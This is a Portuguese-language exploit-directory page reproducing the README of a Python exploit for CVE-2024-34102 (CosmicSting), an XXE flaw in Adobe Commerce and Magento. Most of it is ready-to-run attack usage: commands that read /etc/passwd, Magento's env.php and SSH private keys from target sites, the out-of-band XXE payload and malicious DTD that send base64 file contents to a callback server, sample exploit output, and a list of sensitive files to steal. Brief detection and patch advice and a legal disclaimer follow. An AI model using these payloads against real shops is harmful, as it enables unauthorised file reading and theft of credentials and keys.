Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-34102 — CVE-2024-34102 exploit for python3 | Kitploit
Ferramentas/GitHubGitHub/nmmorette/cve-2024-34102
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnmmorette/cve-2024-34102

CVE-2024-34102

CVE-2024-34102 exploit for python3

Ver Repositório
1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-34102 - CosmicSting XXE Exploit

Python Version CVE

Exploit para CVE-2024-34102 (CosmicSting) - Vulnerabilidade de Entidade Externa XML (XXE) no Adobe Commerce e Magento.

📋 Sobre a Vulnerabilidade

CVE-2024-34102 é uma vulnerabilidade crítica de XXE (Entidade Externa XML) que afeta:

  • Adobe Commerce versões 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 e anteriores
  • Magento Open Source (mesmas versões)

Esta vulnerabilidade permite que um atacante não autenticado:

  • 📄 Leia arquivos arbitrários do servidor
  • 🔐 Exfiltre credenciais e configurações sensíveis
  • 💾 Acesse informações do banco de dados
  • 🚨 Execute código arbitrário (em alguns cenários)

Pontuação CVSS: 9.8 (Crítica)

🎯 Créditos

Este exploit é baseado no trabalho original de:

  • @Chocapikk - CVE-2024-34102 Original

Melhorias nesta versão:

  • ✅ Servidor DTD dinâmico personalizado (evita dependência do fars.ee)
  • ✅ Servidor de callback com decodificação automática
  • ✅ Validação de parâmetros obrigatórios
  • ✅ Lógica de repetição para serviços externos
  • ✅ Mensagens de erro mais descritivas
  • ✅ Suporte a HTTPS para callbacks
  • ✅ Compatibilidade total com Python 3.8+

🛠️ Requisitos

  • Python 3.8 ou superior
  • Acesso a um servidor para hospedar arquivos DTD (VPS, Burp Collaborator, etc.)
  • Serviço de callback (Burp Collaborator, Oastify ou servidor próprio)

📦 Instalação

root@kitploit:~
# Clone o repositório
git clone https://github.com/SEU_USUARIO/CVE-2024-34102.git
cd CVE-2024-34102

# Instale as dependências
pip install -r requirements.txt

🚀 Uso

Método 1: Usando fars.ee (automático)

root@kitploit:~
python3 exploit.py \
  -u https://alvo.com \
  -f /etc/passwd \
  -c seu-callback.oastify.com

Método 2: Usando seu próprio servidor DTD

Terminal 1 - Servidor DTD:

root@kitploit:~
sudo python3 server_dtd.py

Terminal 2 - Exploit:

root@kitploit:~
python3 exploit.py \
  -u https://alvo.com \
  -f /etc/passwd \
  -c seu-callback.oastify.com \
  --dtd-server SEU-IP:8000

Método 3: Com seu próprio servidor de callback

Terminal 1 - Servidor DTD:

root@kitploit:~
sudo python3 server_dtd.py

Terminal 2 - Servidor de Callback (auto-decodifica):

root@kitploit:~
sudo python3 callback_server.py

Terminal 3 - Exploit:

root@kitploit:~
python3 exploit.py \
  -u https://alvo.com \
  -f /etc/passwd \
  -c SEU-CALLBACK-IP \
  --dtd-server SEU-DTD-IP:8000

📝 Parâmetros

Obrigatórios:

  • -u, --url - URL do alvo (domínio base)
  • -f, --file - Arquivo a ser lido do servidor (ex.: /etc/passwd)
  • -c, --callback - Servidor de callback (IP/domínio)

Opcionais:

  • --dtd-server - Servidor personalizado para hospedar o arquivo DTD
  • --https - Usar HTTPS para o callback (padrão: HTTP)

🎬 Exemplos

Ler /etc/passwd

root@kitploit:~
python3 exploit.py \
  -u https://site-vulneravel.com \
  -f /etc/passwd \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

Ler configuração do Magento

root@kitploit:~
python3 exploit.py \
  -u https://site-vulneravel.com \
  -f /var/www/html/app/etc/env.php \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

Ler chaves SSH

root@kitploit:~
python3 exploit.py \
  -u https://site-vulneravel.com \
  -f /home/ubuntu/.ssh/id_rsa \
  -c abc123.burpcollaborator.net \
  --dtd-server 192.168.1.100:8000 \
  --https

🔍 Como Funciona

1. XXE Fora de Banda

O exploit usa a técnica XXE Fora de Banda para exfiltrar dados:

root@kitploit:~
<!-- Payload enviado ao alvo -->
<!DOCTYPE r [
  <!ENTITY % sp SYSTEM "http://seu-servidor/exploit.dtd">
  %sp;
  %param1;
]>
<r>&exfil;</r>

2. DTD Externo

O servidor alvo baixa o DTD malicioso:

root@kitploit:~
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">

3. Exfiltração

O servidor processa o XML, lê o arquivo, codifica em base64 e envia para o callback:

root@kitploit:~
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...

4. Decodificação

root@kitploit:~
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d

📊 Exemplo de Saída

root@kitploit:~
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Alvo: https://site-vulneravel.com
[+] Servidor de Callback: abc123.oastify.com
[+] Usando servidor DTD personalizado: 192.168.1.100:8000
[+] URL DTD: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http

O DTD será gerado dinamicamente com:
[*]   Callback: http://abc123.oastify.com
[*]   Arquivo: /etc/passwd

O servidor DTD está rodando? Pronto para continuar? [s/N]: s
[+] Arquivo alvo: /etc/passwd
[+] URL de Callback: http://abc123.oastify.com/?exploited=...
[*] Enviando payload XXE para: https://site-vulneravel.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Status da resposta: 500
[!] Status 500 - Isso é normal! O XXE pode ter sido acionado.
[!] Verifique seu servidor de callback em busca de requisições recebidas.
[*] Aguardando callback (5 segundos)...

=== VERIFIQUE SEU SERVIDOR DE CALLBACK ===
[!] Monitore seu serviço de callback por requisições HTTP recebidas
[!] Requisição esperada: http://abc123.oastify.com/?exploited=<dados_base64>

Para decodificar os dados exfiltrados:
[*]   echo 'STRING_BASE64' | base64 -d

[!] Verifique seu painel Burp Collaborator ou Oastify agora!

🛡️ Detecção e Mitigação

Para Defensores:

Detecção:

  • Monitore requisições HTTP para endpoints /rest/V1/guest-carts/*/estimate-shipping-methods
  • Alerte sobre payloads XML com entidades externas (<!ENTITY)
  • Detecte conexões de saída para domínios suspeitos

Mitigação:

  • Atualize para versões corrigidas:
    • Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9
  • Desabilite o processamento de entidades externas no parser XML
  • Implemente WAF com regras anti-XXE

Para Pentesters:

Arquivos interessantes para testar:

root@kitploit:~
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ

⚖️ Aviso Legal

root@kitploit:~
Este exploit é fornecido apenas para fins educacionais e de pesquisa em segurança.

Usar este código para testar sistemas sem autorização explícita é ILEGAL.

Você é o ÚNICO responsável por suas ações. Use apenas em:
✅ Seus próprios ambientes de teste
✅ Programas de bug bounty autorizados
✅ Testes de penetração contratados

NÃO use em:
❌ Sistemas sem autorização
❌ Ambientes de produção sem permissão
❌ Qualquer atividade maliciosa

O autor não se responsabiliza pelo uso indevido deste código.

📚 Referências

  • Boletim de Segurança Adobe APSB24-40
  • Detalhes CVE-2024-34102
  • OWASP Prevenção de XXE
  • Exploit Original por Chocapikk

⭐ Se este projeto foi útil, considere dar uma estrela!

Baixar ferramenta